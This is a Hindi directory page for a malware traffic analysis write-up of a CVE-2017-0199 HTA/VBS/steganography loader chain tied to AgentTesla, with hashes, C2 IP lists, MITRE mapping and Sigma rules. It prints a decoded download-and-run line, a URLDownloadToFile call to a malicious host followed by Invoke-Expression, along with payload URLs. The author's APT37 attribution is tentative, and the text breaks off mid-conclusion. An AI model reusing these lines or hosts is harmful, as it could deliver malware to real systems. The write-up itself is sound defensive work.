Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant — CVE-2017-0199 XLS --> HTA --> VBS --> STEGANOGRAPHY --> DBATLOADER/GULOADER शैली का मैलवेयर | Kitploit
उपकरण/GitHubGitHub/blackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant
शोषणनेटवर्क फोरेंसिकस्टेग्नोग्राफीमालवेयर विश्लेषणडिजिटल फोरेंसिककमांड एंड कंट्रोलखतरा खुफिया
GitHubblackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant

XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant

CVE-2017-0199 XLS --> HTA --> VBS --> STEGANOGRAPHY --> DBATLOADER/GULOADER शैली का मैलवेयर

रिपॉजिटरी देखें
76 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विश्लेषित फ़ाइल

PCAP-आधारित विश्लेषण | दिनांक: 2025-03-12 | लेखक: BlackOclock

विषय सूची

1. विश्लेषण अवलोकन

  • 1.1 विश्लेषित फ़ाइल (केवल PCAP)
  • 1.2 संक्रमण समयरेखा और CVE मैपिंग

2. नेटवर्क ट्रैफ़िक विश्लेषण

  • 2.1 प्रोटोकॉल पदानुक्रम – बड़ा चित्र
  • 2.2 वार्तालाप – शीर्ष वार्ताकार और डेटा स्थानांतरण
  • 2.3 एंडपॉइंट – Tx/Rx पुष्टि
  • 2.4 HTTP निर्यात ऑब्जेक्ट – निकाली गई फ़ाइलें
  • 2.5 HTTP कंटेंस फ़िल्टर – स्टेग्नोग्राफ़ी जाँच

3. नेटवर्कमाइनर विश्लेषण

  • 3.1 निकाली गई फ़ाइलों का अवलोकन
  • 3.2 फ़ाइल विवरण (HTA, VBS, TXT)
  • 3.3 JA3 / JA3S /JA4 फ़िंगरप्रिंट

4. ZEEK (ZUI) लॉग विश्लेषण

  • 4.1 फ़ाइल निष्कर्षण पुष्टि
  • 4.2 MD5/SHA1 हैश और टाइमस्टैंप
  • 4.3 VirusTotal एकीकरण

5. निकाली गई फ़ाइलें और स्थैतिक विश्लेषण

6. ट्रायेज और व्यवहार विश्लेषण

  • 6.1 HTA ट्रायेज – mshta.exe निष्पादन
  • 6.2 VBS ट्रायेज – WScript.exe और PowerShell
  • 6.3 TXT ट्रायेज – Notepad.exe और रैनसमवेयर व्यवहार

7. प्रक्रिया इंजेक्शन विश्लेषण

  • 7.1 प्रक्रिया वृक्ष – mshta → cmd → powershell → csc → Notepad
  • 7.2 WriteProcessMemory घटनाएँ
  • 7.3 टोकन हेरफेर (SeDebugPrivilege)

8. मेमोरी डंप विश्लेषण

  • 8.1 PowerShell मेमोरी डंप (HTA) (PID 4424)
  • 8.2 comonstraints.vbs मेमोरी डंप (PID 1184)

9. C2 पहचान और फ़िंगरप्रिंटिंग

  • 9.1 Jarm / JA4 विश्लेषण
  • 9.2 GreyNoise और Shodan पिवोटिंग और C2 बुनियादी ढाँचा मैपिंग

10. एक्सफ़िल्ट्रेशन विश्लेषण

  • 10.1 FTP ट्रैफ़िक – 89.39.83.184
  • 10.2 चुराए गए क्रेडेंशियल और संपर्क सूचियाँ

11. रैनसमवेयर व्यवहार

  • 11.1 foeMMBIG.txt निष्पादन
  • 11.2 इंजेक्शन लक्ष्य के रूप में Notepad.exe

12. खतरा खुफिया

  • 12.1 VirusTotal और MalwareBazaar परिणाम
  • 12.2 MITRE ATT&CK मैपिंग
  • 12.3 APT37 (ScarCruft) सहसंबंध

13. डिटेक्शन इंजीनियरिंग

  • 13.1 सिग्मा नियम

14. निष्कर्ष और IOCs

  • 14.1 पूर्ण आक्रमण श्रृंखला सारांश

  • 14.2 समझौता संकेतक (IP, हैश, डोमेन)

  • 14.3 सिफारिशें

    root@kitploit:~
                                         नोट!!! इस विश्लेषण में 'केवल' PCAP फ़ाइल का उपयोग किया गया था! ZIP फ़ाइलों की आवश्यकता नहीं थी;
    

##1. विश्लेषण अवलोकन

Malware-Traffic-Analysis.net स्रोत फ़ाइलें

आकृति 1: malware-traffic-analysis.net से डाउनलोड की गई स्रोत फ़ाइलें - 'केवल' PCAP फ़ाइल का उपयोग किया गया\

2025-01-09 (गुरुवार): CVE-2017-0199 XLS --> HTA --> VBS --> स्टेग्नोग्राफ़ी --> DBATLOADER/GULOADER शैली का मैलवेयर

##2. नेटवर्क ट्रैफ़िक विश्लेषण

2.1-प्रोटोकॉल पदानुक्रम – बड़ा चित्र

प्रोटोकॉल पदानुक्रम

मैंने ट्रैफ़िक का एक बड़ा चित्र प्राप्त करने के लिए प्रोटोकॉल पदानुक्रम से शुरुआत की। यह प्रत्येक उपयोग किए गए प्रोटोकॉल की मात्रा दर्शाता है। जैसा कि चित्र में दिखाया गया है, TLS सभी ट्रैफ़िक का 82.4% हिस्सा है। इसके अतिरिक्त, मीडिया लाइन और लाइन-आधारित डेटा भी मौजूद है। हालाँकि, नेटवर्क गतिविधि को बेहतर ढंग से समझने के लिए, हमें वार्तालाप और एंडपॉइंट की जाँच करने की आवश्यकता है।

2.2-वार्तालाप – शीर्ष वार्ताकार और डेटा स्थानांतरण

वार्तालाप

हम उन IP जोड़ियों का पता लगाने के लिए वार्तालाप का उपयोग करते हैं जिनके बीच सबसे अधिक डेटा स्थानांतरण होता है। विश्लेषण से पता चलता है कि 10.9.1.101 (होस्ट) और 104.17.201.1 के बीच सबसे अधिक ट्रैफ़िक वॉल्यूम है। इस डेटा स्थानांतरण के लिए पोर्ट 80 और 443 का उपयोग किया गया। इसके अतिरिक्त, हम देखते हैं कि 104.17.201.1 से 10.9.1.101 (होस्ट) को 3 MB डेटा स्थानांतरित किया गया। एक और महत्वपूर्ण निष्कर्ष WAN IP (89.39.83.184) से कनेक्शन के कारण पोर्ट 21 पर कनेक्शन है, जो संभावित एक्सफ़िल्ट्रेशन का संकेत देता है। लेकिन हम अभी निश्चित नहीं हैं, क्योंकि हम इसके बारे में अभी तक नहीं जानते हैं। हमें एक प्रमाण चाहिए!

2.3- एंडपॉइंट

एंडपॉइंट

हम नेटवर्क पर शीर्ष वार्ताकारों की पहचान करने के लिए एंडपॉइंट का उपयोग करते हैं। 104.17.201.1 में 3MB प्रेषित डेटा (Tx) है और 10.9.1.101 में 3MB प्राप्त डेटा (Rx) है। इसके अतिरिक्त, शीर्ष वार्ताकार स्रोत के रूप में 104.17.201.1 और गंतव्य के रूप में 10.9.1.101 हैं।

2.4- HTTP निर्यात ऑब्जेक्ट

निर्यात

निर्यात का उपयोग नेटवर्क पर स्थानांतरित फ़ाइलों, डेटा, ईमेल आदि की पहचान करने के लिए किया जाता है। हर बार, जब हम pcap का विश्लेषण करते हैं, तो हमें यहाँ जाँच करनी चाहिए कि कौन से पैकेट में कौन सा डेटा है। खैर, हमने 88,132,2457 और 2468 पैकेट नोट किए।

2.5- HTTP कंटेंस फ़िल्टर

निर्यात

यदि नेटवर्क पर http प्रोटोकॉल हैं। तो हमें फ़िल्टर पर png,zip,jpg,jpeg (स्टेग्नोग्राफ़ी) को एक मीडिया के रूप में जाँचना चाहिए, क्योंकि हमलावर अक्सर एंटीवायरस डिटेक्शन को बायपास करने के लिए मीडिया फ़ाइलों पर दुर्भावनापूर्ण कोड का उपयोग करते हैं।

#उदाहरण: http contains ".png" या http contains ".jpg" या http contains ".jpeg" या http contains ".zip"

हम बस देख रहे हैं कि जब नेटवर्क पर 80 पोर्ट का उपयोग किया जाता है तो यह फ़िल्टर क्यों महत्वपूर्ण है। यहाँ एक .hta है जो 47 पैकेट पर मीडिया फ़ाइलों पर भेजा गया था। लेकिन जब हम फ़ाइलों की पहचान करने के लिए निर्यात का उपयोग करते हैं, तो वह नहीं था।

##3. नेटवर्कमाइनर विश्लेषण

  • 3.1 फ़ाइल विवरण (HTA, VBS, TXT)

नेटवर्कमाइनर

हम PCAP पर तेजी से पहचान करने के लिए नेटवर्कमाइनर का उपयोग कर सकते हैं। यदि आप REMnux या Linux सिस्टम का उपयोग करते हैं, तो आप टर्मिनल पर लिख सकते हैं ( networkminer pcap_name )

फ्रेम = 47 फ़ाइलनाम = seemebestthingsevermeetgivenbestthingsfornewways | एक्सटेंशन = .hta | आकार = 47 KB | स्रोत IP = 192.3.27.144 फ्रेम = 132 | फ़ाइलनाम = comonstraints | एक्सटेंशन = .vbs | आकार = 223 KB | स्रोत IP = 107.172.31.5 फ्रेम = 2457 | फ़ाइलनाम = foeMMBIG | एक्सटेंशन = .txt | आकार= 325 KB | स्रोत IP = 107.172.31.5

  • 3.2 JA3 / JA3S /JA4 फ़िंगरप्रिंट

नेटवर्कमाइनर JA4/JA3

JA3 हैश:

  • 06843d66057fc9cbe42e9d690308903 (फ्रेम 8)
  • 62136a81b5b727d039d8160d188863aa (फ्रेम 14)
  • 3c4eb72b882d4d1442c67ce73f1292a9 (फ्रेम 140)

JA4 फ़िंगरप्रिंट:

  • t13d1516h2_8daaf6152771_02713d6af862
  • t13d201000_2b729b4bf63_29829a46703f

खैर, लेकिन हमें JA4 और JA3 हैश की आवश्यकता क्यों है? एक प्रश्न हो सकता है कि JA3 और JA4 क्या हैं?

मुझे समझाने दीजिए; JA3 और JA4 TLS हैंडशेक के मापदंडों के आधार पर TLS क्लाइंट और सर्वर को फ़िंगरप्रिंट करने की तकनीकें हैं। JA3 TLS हैंडशेक के क्लाइंट हैलो पैकेट का MD5 हैश बनाता है, जो क्लाइंट एप्लिकेशन (जैसे, ब्राउज़र, मैलवेयर) की विशिष्ट पहचान करता है।

JA4 एक नई तकनीक है। यह इंटरनेट ट्रैफ़िक के लिए एक फ़िंगरप्रिंट की तरह है। जिस तरह मनुष्यों के अद्वितीय फ़िंगरप्रिंट होते हैं, उसी तरह इंटरनेट से जुड़ने वाला प्रत्येक सॉफ़्टवेयर एक अद्वितीय निशान छोड़ता है। C2 सर्वर खोजने में अधिक सहायक।

##4. ZEEK (ZUI) लॉग विश्लेषण

  • 4.1 फ़ाइल निष्कर्षण पुष्टि, MD5/SHA1 हैश और टाइमस्टैंप, VirusTotal एकीकरण

HTTP ट्रैफ़िक से निकाली गई फ़ाइलों को सत्यापित करने के लिए Zeek लॉग का उपयोग किया गया। files.log निम्नलिखित प्रविष्टियाँ दिखाता है:

इन हैश का उपयोग बाद में VirusTotal लुकअप के लिए किया गया।

hta परिणाम

Hta (seemebestthing…)

MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

vbs परिणाम

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

foeMMBIG परिणाम

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

##5. निकाली गई फ़ाइलें और स्थैतिक विश्लेषण

यहाँ हम डेस्कटॉप पर pcap से सभी फ़ाइलों का निर्यात करेंगे और हम binwalk के साथ विश्लेषण करेंगे

foeMMBIG परिणाम

HTA फ़ाइल साफ दिखती है। मुझे कोई छिपा हुआ डेटा नहीं मिला। यह एक सामान्य टेक्स्ट फ़ाइल प्रतीत होती है।

VBS फ़ाइल अलग है। मुझे इसके अंदर दो चीज़ें मिलीं:

कुछ Base64 डेटा और एक HTML दस्तावेज़ इसका मतलब है कि VBS फ़ाइल में कई परतें हैं। हमलावर ने इसके अंदर कोड छिपाने की कोशिश की।

TXT फ़ाइल ने मुझे एक अजीब आउटपुट दिया। यह "Broadcom header" कहता है, जो एक टेक्स्ट फ़ाइल के लिए समझ में नहीं आता। शायद फ़ाइल टूटी हुई है, या इसके अंदर कोई और परत है। मुझे और अधिक समझने के लिए इसे सैंडबॉक्स में चलाने की आवश्यकता है

##6. ट्रायेज और व्यवहार विश्लेषण

  • 6.1 HTA ट्रायेज – mshta.exe निष्पादन

मैंने HTA फ़ाइल को सैंडबॉक्स में चलाया। यहाँ क्या हुआ:

HTA ट्रायेज

हमारे पास hta का परिणाम है। ट्रायेज द्वारा स्कोर 8/10।

HTA ट्रायेज

5 चरणों वाली प्रक्रिया श्रृंखला: mshta.exe (PID 1080) शुरू हुआ इसने cmd.exe (4952) लॉन्च किया cmd.exe ने powershell.exe (4424) लॉन्च किया PowerShell ने SeDebugPrivilege सक्षम किया (अन्य प्रक्रियाओं तक पहुँचने के लिए) कोड इंजेक्शन के लिए WriteProcessMemory का कई बार उपयोग किया गया

इंजेक्शन श्रृंखला:

mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → अज्ञात प्रक्रिया (3332)

PowerShell ने चल रही प्रक्रियाओं की भी जाँच की (डिस्कवरी) और सिस्टम भाषा को देखा (शायद सैंडबॉक्स से बचने के लिए)।

MITRE तकनीकें जो मैंने hta के लिए देखीं:

T1059.001 (PowerShell) T1059.003 (cmd) T1057 (प्रक्रिया खोज) T1134 (टोकन हेरफेर) T1055 (प्रक्रिया इंजेक्शन) T1614.001 (भाषा पहचान)

HTA ट्रायेज

खैर हम यहाँ cmd.exe द्वारा PowerShell कमांड में FromString64Base देखते हैं। हमें base64 में कोड देखने के लिए इसे CyberChef पर डिकोड करना होगा।

HTA ट्रायेज

PowerShell कमांड में, मुझे एक Base64 स्ट्रिंग मिली। CyberChef के साथ इसे डिकोड करने के बाद, मैंने यह देखा:

URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."

इसका मतलब है कि, 107.172.31.5 से comonstraints.vbs डाउनलोड करें और 3 सेकंड सोएं और चलाएं। खैर अगले चरण में comonstraints.vbs डाउनलोड किया जाएगा।

  • 6.2 VBS ट्रायेज – WScript.exe और PowerShell

VBS ट्रायेज

हमारे पास vbs का परिणाम है। ट्रायेज द्वारा स्कोर 10/10।

प्रक्रिया श्रृंखला: Wscript.exe चला और इसने PowerShell.exe लॉन्च किया

खैर चित्र में यदि हम प्रक्रिया में कोड की जाँच करते हैं। हम #x#.GIBMMeof/5.13.271.701//:p##h ----> एक एन्कोडेड पथ है। http://107.172.31.5/foeMMBIG.txt (जो PCAP के निर्यात में देखा गया था)

और यह भी एक साइट https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg, जिसमें jpg के अंदर दुर्भावनापूर्ण कोड है। JPG में <BASE64_START> और <BASE64_END> टैग हैं। उनके बीच, इसका मतलब है कि छिपा हुआ कोड है। छिपा हुआ टेक्स्ट वास्तव में Base64 है लेकिन उल्टा लिखा गया है। स्क्रिप्ट पहले इसे उलटता है, फिर इसे डिकोड करता है। डिकोड करने के बाद, यह एक छोटा प्रोग्राम (.NET असेंबली) बन जाता है और कंप्यूटर पर चलता है।

मैंने jpg डाउनलोड करने की कोशिश की।

VBS ट्रायेज

लेकिन मैं इसे प्राप्त नहीं कर सका। शायद यह पता बंद कर दिया गया था। VBS फ़ाइल एक चित्र डाउनलोड करती है, उसके अंदर छिपा हुआ कोड ढूंढती है, उसे ठीक करती है, और चलाती है। इसे स्टेग्नोग्राफ़ी कहा जाता है – छवियों के अंदर चीज़ों को छिपाना।

MITRE तकनीकें:

T1012 - Query Registry T1082 - System Information Discovery T1055 - Process Injection T1057 – Process Discovery T1134 – Access Token Manipulation

  • 6.3 TXT ट्रायेज – Notepad.exe और रैनसमवेयर व्यवहार

txt ट्रायेज

  • फ़ाइल Notepad.exe (PID 4600) के साथ खोली गई
  • Notepad ने तब अपने आप में कोड इंजेक्ट किया (प्रक्रिया इंजेक्शन)
  • डेस्कटॉप पर फ़ाइलें एन्क्रिप्ट होने लगीं
  • एक फिरौती नोट txt के रूप में दिखाई दिया

यह पुष्टि करता है कि foeMMBIG.txt वास्तव में एक रैनसमवेयर ड्रॉपर है।

MITRE तकनीकें:

  • T1055 (Process Injection)

##7. प्रक्रिया इंजेक्शन विश्लेषण

7.1 प्रक्रिया वृक्ष

mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)

7.2 WriteProcessMemory घटनाएँ

PID 1080 (mshta.exe) ने PID 4952 (cmd.exe) को लिखा PID 4952 (cmd.exe) ने PID 4424 (powershell.exe) को लिखा PID 4424 (powershell.exe) ने PID 4432 (csc.exe) को लिखा PID 4432 (csc.exe) ने PID 3332 (अज्ञात) को लिखा

7.3 टोकन हेरफेर

PowerShell (PID 4424) ने SeDebugPrivilege को सक्षम किया, जिससे यह अन्य प्रक्रियाओं तक पहुँच सके।

##8. मेमोरी डंप विश्लेषण

  • 8.1 PowerShell मेमोरी डंप (HTA) (PID 4424)

जब मैलवेयर चला, तो सैंडबॉक्स ने PowerShell (PID 4424) के मेमोरी स्नैपशॉट लिए। ये स्नैपशॉट उस समय कंप्यूटर की RAM में जो कुछ था उसे सहेजते हैं।

मुझे 20 से अधिक मेमोरी डंप फ़ाइलें मिलीं

hta मेमोरी

  • 8.2 comonstraints.vbs मेमोरी डंप (PID 1184)

VBS फ़ाइल (WScript.exe, PID 1184 द्वारा चलाई गई) ने भी मेमोरी डंप बनाए। ये डंप ज्यादातर 64 KB आकार के होते हैं। यह छोटे आवंटन के लिए सामान्य है। लेकिन मैंने Notepad.exe (PID 4600) के मेमोरी डंप की जाँच की, लेकिन कोई नहीं था। यह दिलचस्प है क्योंकि हम जानते हैं कि Notepad का उपयोग foeMMBIG.txt खोलने के लिए किया गया था।

##9. C2 पहचान और फ़िंगरप्रिंटिंग

  • 9.1 Jarm / JA4 विश्लेषण

jarm

केवल 2 IP से Jarm मुद्रित होता है

  • 9.2 GreyNoise और Shodan पिवोटिंग और C2 बुनियादी ढाँचा मैपिंग

मैंने NetworkMiner से JA4 फ़िंगरप्रिंट निकाले और GreyNoise में उन्हें खोजा। मुझे उसी JA4 फ़िंगरप्रिंट के साथ 26 IP मिले जो दुर्भावनापूर्ण के रूप में चिह्नित थे। फिर मैंने उनके खुले पोर्ट और सेवाओं की जाँच करने के लिए Shodan में इन सभी IP को खोजा।

यह सूची GreyNoise की जाँच करके बनाई गई थी, और ये IP GreyNoise में दुर्भावनापूर्ण के रूप में चिह्नित हैं:

  • 34.122.147.229 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 7 महीने पहले यह IP 2 अलग-अलग हमले प्रकारों में 1222 घटनाओं में शामिल था। हमले: tcp-portscan (1177), fortinet-login (45)। पहली बार देखा गया: 2024-05-07 23:10 UTC, अंतिम बार देखा गया: 2025-07-17 17:28 UTC। 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया। Not After: 2020-11-30 22:10:40 )

  • 107.189.1.175 - shodan का परिणाम C: लक्ज़मबर्ग Org : Buy VM खुले पोर्ट: 80 / 443 / 9001 / 9030

  • 104.197.69.115( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 5 महीने पहले यह IP 2 अलग-अलग हमले प्रकारों में 1159 घटनाओं में शामिल था। हमले: tcp-portscan (1124), fortinet-login (35)। पहली बार देखा गया: 2024-07-11 04:26 UTC, अंतिम बार देखा गया: 2025-09-25 12:08 UTC। 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया )

  • 34.72.176.129 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 5 महीने पहले यह IP 2 अलग-अलग हमले प्रकारों में 1233 घटनाओं में शामिल था। हमले: tcp-portscan (1201), fortinet-login (32)। पहली बार देखा गया: 2024-07-11 04:26 UTC, अंतिम बार देखा गया: 2025-09-25 12:12 UTC। CrowdSec CTI पर अधिक जानकारी प्राप्त करें - स्रोत CrowdSec के अनुसार - 1 वर्ष पहले व्यवहार: शोषण प्रयास / HTTP ब्रूटफोर्स / HTTP क्रॉल + 2 और। CrowdSec CTI पर पूर्ण विवरण
    6/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया

  • 34.123.170.104 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 1 महीना पहले यह IP 3 अलग-अलग हमले प्रकारों में 1141 घटनाओं में शामिल था। हमले: tcp-portscan (1097), fortinet-login (42), web-login (2)। पहली बार देखा गया: 2024-05-23 14:07 UTC, अंतिम बार देखा गया: 2026-01-26 05:22 UTC। CrowdSec CTI पर अधिक जानकारी प्राप्त करें - स्रोत CrowdSec के अनुसार - 1 वर्ष पहले व्यवहार: HTTP क्रॉल / HTTP DoS / HTTP शोषण + 1 और। CrowdSec CTI पर पूर्ण विवरण ) 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया

  • 121.127.42.69 ( 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया)

  • 185.220.101.2 shodan का परिणाम ( होस्टनाम:berlin01.tor-exit.artikel10.org देश : जर्मन संगठन: Artikel10 e.V. ISP : Stiftung Erneuerbare Freiheit (यह TOR है) पोर्ट : 80/443/9001/9002

  • 185.220.101.162 ( होस्टनाम: tor-exit-162.relayon.org देश : जर्मन / संगठन:CIA TRIAD SECURITY LLC ISP : Stiftung Erneuerbare Freiheit)

  • 205.169.39.24 नेटवर्क पोर्ट स्कैनिंग और टोही - स्रोत Guardpot के अनुसार - 8 महीने पहले यह IP 1 हमले प्रकार में 86 घटनाओं में शामिल था। हमले: tcp-portscan (86)। पहली बार देखा गया: 2024-08-22 22:29 UTC, अंतिम बार देखा गया: 2025-07-04 17:29 UTC।

  • 47.254.76.66 ( क्लाउड प्रदाता : Alibaba Cloud देश : USA खुले पोर्ट : 22 ऑपरेटिंग सिस्टम : Linux

  • 47.251.118.89 (क्लाउड प्रदाता : Alibaba Cloud देश : USA खुले पोर्ट : 22 ऑपरेटिंग सिस्टम : Linux)

  • 107.189.12.7( होस्टनाम : tor.privatebrowsing.org देश लक्ज़मबर्ग खुले पोर्ट: 80)

  • 47.88.18.245 ( देश USA ओएस: Linux खुला पोर्ट : 22)

  • 79.127.248.2 ( 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया देश Us)

  • 185.126.82.201( देश : USA पोर्ट : 1080)

  • 45.92.19.139 (देश : USA पोर्ट : 59511)

  • 47.251.186.126( देश : USA पोर्ट : 22)

  • 79.127.221.66 (देश : USA पोर्ट : 1080)

  • 185.241.208.136 ( देश: Poland होस्टनाम ns2.rdp.rs खुले पोर्ट : 111/8440/9001)

  • 47.89.246.29 ( देश : USA पोर्ट : 22)

  • 185.220.101.110 ( होस्टनाम: tor-exit-110.digitalcourage.de खुले पोर्ट : 80/123/443/8080)

  • 5.77.252.202 ( होस्टनाम :host-202.252.77.5.ucom.am देश : Armenia खुले पोर्ट : 1701/8291)

  • 124.198.132.172(Tor) ( देश : USA खुले पोर्ट : 111/8110/9001)

  • 185.220.101.9 (Tor) ( होस्टनाम : berlin01.tor-exit.artikel10.org देश : Poland खुले पोर्ट : 80/443/9001/9002)

  • 213.230.93.13 ( 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया देश : uzbekishtan)

  • 138.199.140.203 ( होस्टनाम :static.203.140.199.138.clients.your-server.de देश : German खुले पोर्ट : 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)

##10. एक्सफ़िल्ट्रेशन विश्लेषण

  • 10.1 FTP ट्रैफ़िक – 89.39.83.184

जब हम 89.39.83.184 की जाँच करते हैं, तो हम देखते हैं कि ip का होस्ट के साथ 21 पोर्ट पर कनेक्शन है। यदि हम 21 ftp पर किसी पैकेट पर क्लिक करते हैं और Follow --- > TCP STREAM, तो हम हमलावर का ईमेल और पासवर्ड देखते हैं

हमलावर की जानकारी

  • 10.2 चुराए गए क्रेडेंशियल और संपर्क सूचियाँ

जब हम नेटवर्कमाइनर पर फ़ाइलों की जाँच करते हैं, तो वहाँ 2498(PW_user1_DESKTOP.html) और 2516(Contacts_Thunder.txt) पैकेट संख्या थी। उन फ़ाइलों का निर्यात करने के बाद और फ़िशिंग हमले (मेरा अनुमान) या खातों की चोरी के लिए उपयोगकर्ता नाम और पासवर्ड की जानकारी होती है।

हमलावर की जानकारी

मैंने हमलावर के बुनियादी ढाँचे के बारे में अधिक जानने के लिए Shodan पर FTP सर्वर IP (89.39.83.184) खोजा।

हमलावर की जानकारी

##12. खतरा खुफिया

12.1 VirusTotal और MalwareBazaar परिणाम

Zeek लॉग (धारा 4) से प्राप्त हैश की VirusTotal और MalwareBazaar पर जाँच की गई। सभी फ़ाइलों को दुर्भावनापूर्ण पुष्टि की गई:

HTA फ़ाइल: 33/61 डिटेक्शन, AgentTesla के रूप में पहचाना गया VBS फ़ाइल: 31/62 डिटेक्शन, AgentTesla / Talu के रूप में पहचाना गया TXT फ़ाइल: 25/62 डिटेक्शन, Zapchast / Bhgd (रैनसमवेयर ड्रॉपर) के रूप में पहचाना गया

पूर्ण हैश सूची के लिए धारा 14.2 देखें।

12.2 MITRE ATT&CK मैपिंग

T1059.001 - PowerShell T1059.003 - cmd T1134 - टोकन हेरफेर T1614.001 - भाषा पहचान T1012 - Query Registry T1082 - System Information Discovery T1055 - Process Injection T1057 – Process Discovery

12.3 APT37 (ScarCruft) सहसंबंध

यह हमला APT37 जैसा क्यों दिखता है?

हमने इस हमले में क्या देखा - APT37 किसके लिए जाना जाता है संक्रमण शुरू करने के लिए HTA फ़ाइल का उपयोग किया गया - APT37 HTA फ़ाइलों का बहुत उपयोग करता है base64 कमांड के साथ PowerShell - APT37 PowerShell पसंद करता है स्टेग्नोग्राफ़ी (JPG जिसमें छिपा हुआ कोड है) - APT37 चित्रों में कोड छुपाता है प्रक्रिया इंजेक्शन (mshta → cmd → powershell → csc) - APT37 विश्वसनीय प्रक्रियाओं में कोड इंजेक्ट करता है चुराए गए डेटा का FTP एक्सफ़िल्ट्रेशन - APT37 क्रेडेंशियल और फ़ाइलें चुराता है अंत में रैनसमवेयर - APT37 अब रैनसमवेयर का भी उपयोग करता है लक्ष्य शायद यूरोप में - APT37 यूरोप में सक्रिय है निष्कर्ष इस हमले में हमने जो तकनीकें देखीं, वे APT37 के सामान्य व्यवहार से मेल खाती हैं। यह 100% प्रमाण नहीं है, लेकिन यह APT37 जैसा दिखता है। एक उत्तर कोरियाई हैकर समूह संभवतः इसके पीछे है।

##13. डिटेक्शन इंजीनियरिंग

  • 13.1 सिग्मा नियम

title: PowerShell में SeDebugPrivilege description: SeDebugPrivilege सक्षम करने वाले PowerShell का पता लगाता है (संभावित टोकन हेरफेर) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection

title: FTP एक्सफ़िल्ट्रेशन description: ऐसी प्रक्रियाओं से FTP कनेक्शन का पता लगाता है जिन्हें FTP का उपयोग नहीं करना चाहिए logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: PowerShell डाउनलोड description: इंटरनेट से फ़ाइलें डाउनलोड करने वाले पावरशेल का पता लगाता है logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection

title: Temp से Notepad description: Temp फ़ोल्डर से फ़ाइलें खोलने वाले नोटपैड का पता लगाता है (संभावित प्रक्रिया इंजेक्शन) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection

नोट! मुझे पता है कि यह बुनियादी है, लेकिन मैं सिर्फ सिग्मा-नियम सीखने की कोशिश कर रहा हूँ।

##14. निष्कर्ष और आईओसी (IOCs)

14.1 पूर्ण हमला श्रृंखला सारांश

संक्रमण एक दुर्भावनापूर्ण HTA फ़ाइल से शुरू हुआ जो 192.3.27.144 से डाउनलोड की गई थी। इसे खोलने पर प्रक्रियाओं की एक श्रृंखला शुरू हुई:

mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe

प्रमुख निष्कर्ष:

